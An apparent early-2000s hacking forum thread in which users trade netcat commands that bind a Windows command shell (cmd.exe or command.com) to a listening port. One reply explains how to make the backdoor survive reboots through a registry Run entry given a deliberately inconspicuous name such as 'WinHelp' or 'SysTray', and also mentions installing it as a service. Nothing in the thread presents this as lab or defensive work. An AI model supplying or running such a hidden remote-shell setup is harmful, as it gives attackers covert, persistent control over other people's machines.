KarachiKing555
Dec 31 2003, 02:12 PM
hello,
nc -L -p ### -d -e cmd.exe by this NC will be listening for incoming connection on port ### and will run cmd.exe on connection if im not wrong !! but wat to doo if u wana do the same on win9x or ME machines there is no cmd.exe there !! should i use command.com or something:blink: pls help thanx
FiStEh
Dec 31 2003, 02:39 PM
yeah id suggest using command.com, thats the same thing for anything <<XP
FiStEh
KarachiKing555
Dec 31 2003, 02:44 PM
thx alot but i wana heard thet some1 did this coz its really important and i dont have win9x machine to test it out !!
JdEeZy
Dec 31 2003, 07:50 PM
yeah, its command.com... worked for me on my old box.
Blast3rPL
Jan 1 2004, 11:29 AM
Hey guyz, said me if i'm able to set listening by telnet ?. If yes said me how.
realmasterX
Jan 1 2004, 02:27 PM
Not Bad!
KarachiKing555
Jan 1 2004, 04:19 PM
ok thanx guyz i set it up and fingures crossed !!
ivan288
Jan 1 2004, 06:11 PM
is there any way to make netcat listen on a certain port so that it autostarts on every startup?
headbanger
Jan 1 2004, 06:19 PM
i tried command.com and it worked
KarachiKing555
Jan 1 2004, 11:10 PM
| QUOTE (ivan288 @ Jan 1 2004, 06:11 PM) |
| is there any way to make netcat listen on a certain port so that it autostarts on every startup? |
if u have access to system registry u can do it easily !! or make .reg file do it ! i dont know there 100 wayz to do this anyway !!
tstngry
Jan 2 2004, 04:10 AM
You can make nc start everytime the machine starts but how do you make it start listening on the same port with the same parameters?
eXist
Jan 2 2004, 05:52 AM
You could *try* editing the registry and doing something like so, this is done in the RUN, under LOCAL MACHINE etc etc...
Make a new string, name it something inconspicuous, such as:
WinHelp
SysTray
WinBackup
etc
Then modify it and for Value data put in:
c:\winnt\system32\nc.exe -L -p 666 -d -e cmd.exe
^^^^^^^^^^^^ this directory refers to wherever you placed it.
I'm unable to check this at present, but give it a go. There's also various other ways to get your stuff starting on bootup, you can try installing it as a service for instance.
Search the forums for other ways.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please
click here.